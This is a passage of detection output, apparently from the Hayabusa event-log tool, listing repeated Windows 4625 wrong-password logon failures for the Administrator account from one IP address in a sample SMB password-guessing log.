NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w4oi8iL88rJo7g2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cF3OUnytXi4NjvqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WKkJcp3TYj31iJUM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G0E44RVqAE1feU0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ny5LCb1qOIUhxOPY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9jcDgzzqH26DjQ1k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yil94cFkU6UP24SK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bkdVHF3vggCcuNdn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4dRRI2CS3aVIX4nX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: chDZq3VgxIE2mRb9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HLVvgMmqLXKZADON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i4avO2AJSlNb0IUL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mdo5CvycGvGhn33y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: heJfjLl1vbX6lMjZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wOP1E6hd4Jtj4gob | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xa7kMCNz0bEGTBqX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HSxTQ4HsZt2DeYVe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YxHpSQwFSV4hveVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n3OwzSPomxZLoCe6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e9IfwDZIfYT6A50K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOf6DbRX4zlNqLdb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 00kXrnJNH40NyoYL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nsNHcb9pnpdRgeL7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucMhgxMXy9Ch1jNm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cfi3ZaLTECJgjM9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: usugjEEBHlhJvOyu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WQ1pM2CVLt5ITVD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NIboW7hNljF3HPpk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rOk5W4rkSYRRw4xS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJTfcwd8rnFc06iF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6sm415W5zkvjdnTV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KEiSbtlmW4ou1mc7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xWeZV5pHt94adwUy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5np7HeCPAFTDdTXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gXbe2jEJVtwaQXlr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7hZFiUCJnaBdHcw4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a71wyo41KV1ZoT7p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogB17WdeOiC19rqn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ANOLPWG12lkW39Ei | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y1vf7OUxb6TH3Q4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bxU5yumSieUzSgzH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9K5EoWWASU8SlSe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PwZLRPFxaFWwjZEe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8fXgFFb3HTMunsoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R1RozAr1uhux4cYW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n7EmuUSv03RnhKsF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jw410HEW8EC3MC9f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UTYp8cEbt3Yggo3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWJVzgYLWIo7SGCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DP13jPdW5Gdl8z56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LNXOWjHmMDhfFVon | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kka1RiF3f7Nhkf8x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2o90lG6attzWU4ZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PyPK9kuJdflQ4RKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a9I3El7d7anR0kIz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eDUMTEfNhFuuqMle | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e0F70d1WstkqnQgA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bm0txApQSp1U42N3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JeEe5ENSIZnfc3FG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oasE54Z1FlpswY0d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bhje1BgvxOlG28JM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9iTIv4UQ4En9RA2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mg8KFm1lCeImj8Sb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h17Fz1s6GJki61jg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Pjjn4FAkJn4h32r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ARVx3FAAww8Gmfvc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sYIwPg5k1wpvWobN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0sfhYQ54SjC4JTX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nfZYnUPV40FShcqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XYbvWVCT0tFixZTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XC6Vmz0ql8myDuGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PJ8JvuvZZzwSOzFo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s06yKaogI6FYkXla | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCjOc7PguxwNKoQR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BX5IosnpdYZK5xZj | IP Addr: 192.168.198.149 | AuthPackage: 